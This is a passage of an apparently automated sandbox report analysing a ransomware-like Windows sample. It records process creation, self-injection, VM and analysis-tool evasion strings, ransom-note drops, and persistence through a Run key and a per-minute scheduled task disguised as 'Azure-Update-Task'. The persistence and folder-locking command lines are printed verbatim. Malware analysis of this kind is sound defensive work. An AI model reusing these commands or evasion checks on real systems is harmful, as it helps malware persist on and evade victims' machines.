            Source: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe'
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d' /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe 'C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe'
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: TpZ10Hfjov.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: TpZ10Hfjov.exe
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: TpZ10Hfjov.exe, 00000000.00000002.652637275.0000000004A10000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000006.00000002.665074291.0000000004AB0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000007.00000002.669744021.00000000049E0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 3.2.TpZ10Hfjov.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 8.2.TpZ10Hfjov.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 3.2.TpZ10Hfjov.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 8.2.TpZ10Hfjov.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeUnpacked PE file: 8.2.TpZ10Hfjov.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,FindCloseChangeNotification,
            Source: build3.exe.8.drStatic PE information: real checksum: 0x555e2 should be: 0x88691
            Source: build2.exe.8.drStatic PE information: real checksum: 0x91d05 should be: 0xae9c4
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 0_2_049790AF push ecx; retf
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00428565 push ecx; ret
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AD8F05 push ecx; ret
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_02F9F0AF push ecx; retf
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_04A08F05 push ecx; ret
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D050 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D008 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D028 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D090 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D0A8 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D318 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050C4E0 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D550 push eax; retn 004Dh
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_00428565 push ecx; ret
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0050D698 push eax; retn 004Dh
            Source: initial sampleStatic PE information: section name: .text entropy: 7.96614983128
            Source: initial sampleStatic PE information: section name: .text entropy: 7.96614983128
            Source: initial sampleStatic PE information: section name: .text entropy: 7.93947278285
            Source: initial sampleStatic PE information: section name: .text entropy: 7.93947278285

            Persistence and Installation Behavior:

            barindex
            Infects executable files (exe, dll, sys, html)Show sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile created: C:\_readme.txtJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeFile created: C:\Users\user\_readme.txtJump to behavior

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe'
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls 'C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d' /deny *S-1-1-0:(OI)(CI)(DE,DC)
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: TpZ10Hfjov.exe, 00000008.00000003.713949719.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\WIRESHARK\WIRESHARK.EXE8116
            Source: TpZ10Hfjov.exe, 00000008.00000003.713949719.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE10112
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 0_2_0497771C rdtsc
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeThread delayed: delay time: 196000
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exe TID: 6916Thread sleep time: -196000s >= -30000s
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 8_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeThread delayed: delay time: 196000
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyper v4225
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|vmware player*|vmplayer4486
            Source: TpZ10Hfjov.exe, 00000008.00000002.813120379.0000000002E60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: TpZ10Hfjov.exe, 00000008.00000003.714506155.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: hyper-v~
            Source: TpZ10Hfjov.exe, 00000008.00000003.713949719.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmplayer7859
            Source: TpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|hyper-v manager*|hyperv3631
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|vmware vsphere client*|vp5534
            Source: TpZ10Hfjov.exe, 00000008.00000003.713949719.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: VMware.Horizon.Client9116
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|vmware workstation 12 player*|vmplayer5018
            Source: TpZ10Hfjov.exe, 00000008.00000002.813120379.0000000002E60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|vmware vsphere client*|vcenter5892
            Source: TpZ10Hfjov.exe, 00000008.00000002.813120379.0000000002E60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: TpZ10Hfjov.exe, 00000008.00000003.714211517.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|turn windows features on or off*|hyper-v3313
            Source: TpZ10Hfjov.exe, 00000008.00000003.713949719.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe7674
            Source: TpZ10Hfjov.exe, 00000008.00000003.714025396.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: *|vmware horizon client*|view2527
            Source: TpZ10Hfjov.exe, 00000008.00000002.813120379.0000000002E60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: TpZ10Hfjov.exe, 00000008.00000003.713949719.0000000002DF0000.00000004.00000001.sdmpBinary or memory string: VMware.Workstation.vmui7347
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 0_2_0497771C rdtsc
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00424168 _memset,IsDebuggerPresent,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,FindCloseChangeNotification,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 0_2_049760A3 push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AB0042 push dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_02F9C0A3 push dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeCode function: 7_2_049E0042 push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_004329BB SetUnhandledExceptionFilter,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Contains functionality to inject code into remote processesShow sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 6_2_04AB0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeMemory written: C:\Users\user\Desktop\TpZ10Hfjov.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeMemory written: C:\Users\user\Desktop\TpZ10Hfjov.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeMemory written: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe'
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\Desktop\TpZ10Hfjov.exe 'C:\Users\user\Desktop\TpZ10Hfjov.exe' --Admin IsNotAutoStart IsNotTask
            Source: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe C:\Users\user\AppData\Local\c460aca5-c7cd-4b49-954f-ce58511e038d\TpZ10Hfjov.exe --Task
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeProcess created: C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe 'C:\Users\user\AppData\Local\bcce123f-47b1-4a2a-a389-92f65e204908\build3.exe'
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 3_2_00427756 cpuid
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: EnumSystemLocalesW,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: GetLocaleInfoW,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: EnumSystemLocalesW,
            Source: C:\Users\user\Desktop\TpZ10Hfjov.exeCode function: 0_2_0049BBE4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
